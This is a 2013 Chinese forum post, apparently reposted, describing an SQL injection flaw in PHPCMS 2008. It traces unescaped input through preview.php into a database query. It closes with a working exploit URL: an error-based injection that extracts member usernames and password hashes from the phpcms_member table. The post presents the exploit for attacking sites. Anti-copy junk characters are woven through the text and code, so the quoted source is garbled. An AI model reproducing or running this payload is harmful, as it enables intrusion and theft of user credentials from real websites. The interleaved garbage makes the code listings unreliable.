中国网络渗透测试联盟

标题: PHPCMS 2008 最新漏洞(第二季)附EXP [打印本页]

---

作者: admin    时间: 2013-4-19 19:17
标题: PHPCMS 2008 最新漏洞(第二季)附EXP
说好的第二季来了......
$ J5 f1 n" d6 x4 ~$ q
6 T6 |2 z+ d' C6 f3 h; s2 e   要转摘的兄弟们，你们还是带个版权吧！   
$ t- K- _* J0 G1 A, G5 Q6 T1 {
  组织 : http://www.safekeyer.com/   (欢迎访问）
  u# y& J* l& A2 p9 v+ P: Q1 d0 _
/ D, j6 q. {) `5 aauthor: 西毒    blog: http://hi.baidu.com/sethc5

! N; u4 x1 [' c" N$ ]     

其实还是有蛮多漏洞的，只是我一步步来吧！你们别催，该放的时候自然就会放了.

过程不明显的我就省略了。

1 G8 f0 W0 |4 d" |在preview.php 中第7行
' [: a8 J! h5 o2 @6 L9 |$ `& l
9 L% a2 `; \5 O  G5 ^$r = new_stripslashes($info);

$ z+ u8 F3 K% ]' \$ ?+ E; z- W我们跟踪new_stripslashes这个函数

' v* a* I( r5 }( }( Y在global.func.php中可以找到
; b6 h- l5 o. X! g0 z4 v" A. r3 d
# X( w5 f: j4 h8 `% W9 K* l4 m1
2
3
7 i$ v" _" K- ~4
5
$ X1 b8 C5 H! d3 B2 B4 H4 ?6 function new_stripslashes($string)
. K! ?9 N( J% ^6 o{
    if(!is_array($string)) return stripslashes($string);
    foreach($string as $key => $val) $string[$key] = new_stripslashes($val);
    return $string;
- v/ @* i  O/ w9 H, u$ e4 z3 N: w}

这个函数的功能不用解释了吧
( H+ }% w1 z/ j" |2 g% M9 S, g+ l
所以我们看具体应用点再哪？
4 t8 }/ \. f7 [) f) U  F
1
2
! J9 d/ M6 C. O9 Q3
( M/ x* g, ~: D7 f  v# o1 A3 [& a4
. P$ O9 n  x4 A5
; i/ s/ Z# P' ~/ ]# c6
7
8
$ U% w0 `5 N; h5 w9 R; [9
10
11
+ K7 _7 |3 ]; }- U" P# m( W12
& J4 \- u' n# u1 g- \13
14
6 \& p* b4 N2 |15
16
* F7 y3 ?* `$ w4 y5 a5 ~17
7 N: |' k8 ~: t) ~18
9 Q* ~4 a$ D+ t$ x19
20
21
/ u+ o* D% X4 N/ C22
5 O3 V6 h  n8 }1 ]; @: b23
24
% f* a+ j7 U/ E3 i25
6 v1 @* e" ?' W3 ?9 T% T26
7 `4 u3 V5 k) Z/ o/ o% [27
28
29
30
( k$ X- q* D2 d+ o; d31
9 i; A: z! V+ l7 W; {3 y32
33
34
35 require dirname(__FILE__).'/include/common.inc.php';
- ]8 z- h0 v( N6 x" Nif(!$_userid) showmessage('禁止访问'); // 所以前提是我们注册个会员就ok了.
require_once CACHE_MODEL_PATH.'content_output.class.php';
require_once 'output.class.php';
if(!is_array($info)) showmessage('信息预览不能翻页');//这里将要带进来我们的危险参数了
$r = new_stripslashes($info);   //反转义了.....关键
/ H$ Z. X; ^1 D- P6 s$C = cache_read('category_'.$r['catid'].'.php');
$out = new content_output();
6 w4 d, Y1 R8 m+ ]$r['userid'] = $_userid;
0 ?5 h/ k' u& G/ K9 ?3 x2 O' f$r['inputtime'] = TIME;
2 o5 u1 M& ?6 u1 r% n$data = $out->get($r);
extract($data);
$userid = $_username;
for($i=1;$i<10;$i++)
{
    $str_attachmentArray[$i] = array("filepath" => "images/preview.gif","description" => "这里是图片的描述","thumb"=>"images/thumb_60_60_preview.gif");
4 e  s; R2 \% Q' _8 v}
( A% C$ D4 }; X" u& F; n& h4 e4 K        
* H. M1 h4 f8 T1 z$array_images = $str_attachmentArray;
- ]9 k( ?: s; s! ]& h, e, u$images_number = 10;
$allow_priv = $allow_readpoint = 1;
$updatetime = date('Y-m-d H:i:s',TIME);
1 Q1 a+ c$ ]! P2 g3 Q) b        
7 [: C( ]+ O& q# e7 ]- m1 M$page = max(intval($page), 1);
$pages = $titles = '';
6 X; s: T; w4 W+ Lif(strpos($content, '') !== false)  //这里必须还有这个这个字符.....才能操作哈
" U4 [5 z! q6 L: j{
    require_once 'url.class.php';
    $curl = new url();
  @1 c9 a! H/ P9 Q7 J    $contents = array_filter(explode('', $content));
: O. e" b  R% G* N9 Y    $pagenumber = count($contents);
    for($i=1; $i<=$pagenumber; $i++)
    {
% m) t3 b, h( s        $pageurls[$i] = $curl->show($r['contentid'], $i, $r['catid'], $r['inputtime']);//这里contentid进入SQL语句当中
    }
6 v! q  q: X6 M其中细节我就不说了...
' @7 X4 R5 m% v# S/ A& E. F
; B% @2 \: P' w! f0 m+ S4 Q我们看看这个$curl资源句柄中的show方法
$ G2 v& Y4 }+ t8 I4 B1 }
1 $pageurls[$i] = $curl->show($r['contentid'], $i, $r['catid'], $r['inputtime']);
' r. I* J! h# y
% x) c7 c# w% u2 z: f/ A+ o( ~1
9 n/ I6 P" O1 |! H' H7 N! w5 G2
3
* N, _" d, l8 j9 j# m. e4
5
) b/ z! k8 X% O3 }6
7
0 q2 L& {, Y8 O8 function show($contentid, $page = 0, $catid = 0, $time = 0, $prefix = '')
" w4 u0 ~$ j7 l& Q% P* j    {
        global $PHPCMS;
        if($catid == 0 || $time == 0 || $prefix == '')
0 A/ O; ^! d2 E; R# f) s        {
            $r = $this->db->get_one("SELECT * FROM `".DB_PRE."content` WHERE `contentid`='$contentid'");
: z+ `: w- P6 G# D/ U            if($r['isupgrade'] && !empty($r['url']))
            {

所以结合前面的......我们x站了吧

0 y) ], w3 o: B给出exp

www.xxxxx.com/preview.php?info[catid]=15&content=ab&info[contentid]=2' and (select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)-- a​
  I3 p( H1 O4 a: ~2 ^5 b
截图看一下

最后真心说句，360收购漏洞计划，价格真心低.....
1 h& @  H$ F- j! Q6 n% ~http://www.myhack58.com/Article/UploadPic/2013-4/2013419151239428.jpg

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2